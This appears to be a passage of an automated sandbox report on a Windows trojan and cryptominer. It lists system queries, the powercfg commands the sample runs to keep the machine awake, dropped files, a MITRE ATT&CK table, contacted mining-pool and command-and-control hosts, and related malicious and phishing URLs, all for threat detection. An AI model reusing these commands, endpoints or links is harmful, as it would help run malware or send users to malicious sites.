Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior

Source: explorer.exe, 0000002C.00000002.4195594913.0000000000B59000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: procexp.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	11 Windows Service	11 Windows Service	2 Masquerading	OS Credential Dumping	331 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Service Execution	1 DLL Side-Loading	411 Process Injection	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	141 Virtualization/Sandbox Evasion	Security Account Manager	141 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	411 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	23 System Information Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
gq83mrprwy.exe	63%	ReversingLabs	Win64.Trojan.Generic
gq83mrprwy.exe	56%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	63%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	58%	Virustotal		Browse
C:\Windows\Temp\zadejssjsckf.sys	5%	ReversingLabs
C:\Windows\Temp\zadejssjsckf.sys	3%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
us-east-1.route-1.000webhost.awex.io	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://crl.ver)	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.google.com	142.250.64.196	true	false		high
xmr-eu1.nanopool.org	212.47.253.124	true	false		high
us-east-1.route-1.000webhost.awex.io	145.14.144.253	true	true	1%, Virustotal, Browse	unknown
pachydermal-deviati.000webhostapp.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Reputation
https://www.google.com/async/ddljson?async=ntp:2	false	high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	high
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGKv9rrEGIjCUP8rJI6uQpcCA_sA23NWIvsltkwq3MeDorQiPFEiOdS9-9s9TL79P98P43HdQwyEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false	high
https://pachydermal-deviati.000webhostapp.com/api/endpoint.php	false	high
https://www.google.com/async/newtab_promos	false	high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false	high
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGKv9rrEGIjD60VmSgpC6cOPMVPM6iFgI5KUXbg-hj5Slfx8AmR1Y-wEuAbZfNmjYd7xW-s1FHlsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://g.live.com/odclientsettings/Prod.C:	edb.log.5.dr	false		high
https://pachydermal-deviati.000webhostapp.com/api/endpoint.php.	explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2	edb.log.5.dr	false		high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000005.00000003.1769186982.000001F4E90C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.dr	false		high
http://ocsp.cloudflare.com/origin_ca0	explorer.exe, 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4196308144.00000000014A0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.cloudflare.com/origin_ca.crl	explorer.exe, 0000002C.00000002.4196308144.00000000014A0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pachydermal-deviati.000webhostapp.com/api/endpoint.phprdurxnlmtixfcpxr	explorer.exe, 0000002C.00000003.1951826740.0000000000BB2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.cloudflare.com/origin_ca.crl0	explorer.exe, 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000005.00000002.4197962632.000001F4E8E00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://ocsp.cloudflare.com/origin_ca	explorer.exe, 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.5.dr	false		high
https://pachydermal-deviati.000webhostapp.com/api/endpoint.php--cinit-version=3.4.0--nicehash--tls--	explorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pachydermal-deviati.000webhostapp.com/api/endpoint.php.exee	explorer.exe, 0000002C.00000003.3172922622.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.2002127076.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.cloudflare.com/origin_ca.crlf	explorer.exe, 0000002C.00000002.4196308144.00000000014A0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000005.00000003.1769186982.000001F4E90C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	false		high
https://pachydermal-deviati.000webhostapp.com/api/endpoint.phpD	explorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
51.15.65.182	unknown	France	12876	OnlineSASFR	true
145.14.144.16	unknown	Netherlands	204915	AWEXUS	true
142.250.64.196	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
145.14.144.253	us-east-1.route-1.000webhost.awex.io	Netherlands	204915	AWEXUS	true

Private

IP
192.168.2.16
192.168.2.4
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1432188
Start date and time:	2024-04-26 16:47:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	47
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	gq83mrprwy.exe renamed because original name is a hash value
Original Sample Name:	3b43da1be0c39802b78f6b2c55c4d7e6.exe
Detection:	MAL
Classification:	mal100.spyw.evad.mine.winEXE@74/18@9/9
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 5 Number of non-executed functions: 23
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 142.250.64.227, 142.250.217.238, 74.125.139.84, 34.104.35.123, 23.45.182.80, 23.204.76.112, 192.229.211.108, 199.232.210.172, 142.250.189.131, 172.217.2.206
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:48:02	API Interceptor	1x Sleep call for process: gq83mrprwy.exe modified
16:48:05	API Interceptor	32x Sleep call for process: powershell.exe modified
16:48:08	API Interceptor	2x Sleep call for process: svchost.exe modified

QR Codes

Source	URL
Screenshot	http://

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
239.255.255.250	http://url9212.charteredarena.org/ls/click?upn=u001.kjyKVeM-2Fb1rGOGHOnr1jOBOY3L3JqbNTsl6-2FG2Q28FBbMvScULOdn5hj4fYmOT1gSvNV_eFFQU5nW4TX33oYM-2FvMZ4H4nrQnEbWOt7nYb46lhhradIe8kQ30nH41Yux5-2ByqjXVzNOeRGeH70TSwGBG-2FsCyfS-2BqFuy7r7yA-2BMVhshonhVyPepAGojJAWOStPfHQEXVhS9QapMz6-2FLiLkIDitr77rwl6cV3-2BOVbi0qMHcpubANPDna-2BAJRWKHhsn2J-2BHsm2h-2B1n0PvhIvECyeSGKW-2FdmoYnwMnfXv-2F0VHDQdAF4JyTklFAWOdWvqmq9QaL29M0Lqvm9PdkAaDucmiv1yWhzGJ-2FSlIlic4yMaUzKSM2tXbVKRT-2BcTJHrLGjV82z-2BxMi-2FPWDvS9vQSeDz0xjN0gvzYnMQqfZiJ7fdvgXYvIvcGvziknMmHkQ7sUHmtLIGr6gsv-2FI2qInnZxnaJ1Ow7w3sMmgc-2FLcAEaJe5QnWJ5qez1H3mc7J1f4VLI4PyjCxv7syUPC13rDkwMklRiABfKztYQ3n9LW3FeH4hgMGYJgJovBs-2FKlVUipIzO24iLrfZpg-2FS6-2Fvp-2BRnBXh4Gim5LY7NxdelnIZomgKJ8r1gxfM163jd5ekCcUFZcZJn8BUr-2FrBOq6vvyf5Ut44ln9oAHSsmy2ecvwUHxQ-2Bo0mJA2r9a8FeSV3APNVBZowUa1ZGpOSvbZRLc6uZxrFl3fSWY774fhm-2Fl3qG7s-2BRWj2lGIHB3NEqH1X520Diu5Le7soeKgWoeaLCSrT5v7lt-2B7XayjukGYP4Yz5jSqZD2gXDxl443sgS6brqBQ3LKHfRN7s2NZ-2F6nWblHw6-2BLG-2FTduGCq0lMfhnVz7mFWLyKhJHvoE3C2dN6qv1-2FpHnRcIGopoYVEdZ-2F182c7Ll7OsxlzgTKemGKriHFjxwOhwkIoHVdgcJWnLS8-3D	Get hash	malicious	Unknown	Browse
	https://runrun.it/share/form/0GZMCgHSxRh4PBOM	Get hash	malicious	HTMLPhisher	Browse
	Dragons Dogma 2 v1.0 Plus 36 Trainer.exe	Get hash	malicious	Unknown	Browse
	http://421225.tctm.xyz	Get hash	malicious	Unknown	Browse
	InmateExport.exe	Get hash	malicious	Unknown	Browse
	http://www.technology-trend.com	Get hash	malicious	Unknown	Browse
	https://islandwaysorbet.com	Get hash	malicious	Unknown	Browse
	https://gelw.nalverd.com/AvGEoxV/	Get hash	malicious	HTMLPhisher	Browse
	http://www.technology-trend.com	Get hash	malicious	Unknown	Browse
	http://svif-venezuela.com/	Get hash	malicious	Unknown	Browse
51.15.65.182	1DI50gCNGQ.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	setup.EXE.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
145.14.144.16	AMED.exe	Get hash	malicious	FormBook	Browse	www.mifurgoentuangar.fun/ip45/?m0=l5EGGChEHj4XKN27dCEHr2wkAcrDBQItB+yEuOqKGof0SFC5OzasTxaDHB4NbpCaaijfls7fEGA1iWY4ma9i/Owpa/X5BDzkgQ==&GA0=9iZUftTB6fwR16
145.14.144.253	REMITT#U007e0.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
xmr-eu1.nanopool.org	SecuriteInfo.com.Win64.TrojanX-gen.22735.27744.exe	Get hash	malicious	Xmrig	Browse	51.15.193.130
	ft1i6jvAdD.exe	Get hash	malicious	Xmrig	Browse	141.94.23.83
	vS3C07uH19.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Xmrig	Browse	51.255.34.118
	kGsmMpk9kX.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Xmrig	Browse	51.68.190.80
	huUaO72kiE.exe	Get hash	malicious	Xmrig, zgRAT	Browse	51.15.58.224
	O1GEDfxZO0.exe	Get hash	malicious	zgRAT	Browse	212.47.253.124
	obaTzlGNzi.exe	Get hash	malicious	Xmrig, zgRAT	Browse	163.172.154.142
	8EbwkHzF0i.exe	Get hash	malicious	Xmrig, zgRAT	Browse	163.172.154.142
	qZTW6BQiPB.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader, XWorm, Xmrig, zgRAT	Browse	163.172.154.142
us-east-1.route-1.000webhost.awex.io	Xmz1XDgtah.exe	Get hash	malicious	DCRat	Browse	145.14.145.191
	msedge_elf.dll	Get hash	malicious	Unknown	Browse	145.14.144.129
	claro.596166.msi	Get hash	malicious	Unknown	Browse	145.14.144.17
	czfsby2aHY.exe	Get hash	malicious	AZORult	Browse	145.14.144.104
	SecuriteInfo.com.Trojan.KillProc2.16811.26778.27406.exe	Get hash	malicious	Unknown	Browse	145.14.145.70
	SecuriteInfo.com.Trojan.KillProc2.16811.26778.27406.exe	Get hash	malicious	Unknown	Browse	145.14.144.29
	JZtRlvNAAe.exe	Get hash	malicious	PureLog Stealer, Remcos	Browse	145.14.144.130
	file.zip	Get hash	malicious	PureLog Stealer, Remcos	Browse	145.14.145.72
	PO20152024.scr.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	145.14.145.149
	0VOqFZVzzg.exe	Get hash	malicious	DCRat	Browse	145.14.145.16

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AWEXUS	http://xred.site50.net/syn/SSLLibrary.dll	Get hash	malicious	Unknown	Browse	153.92.0.100
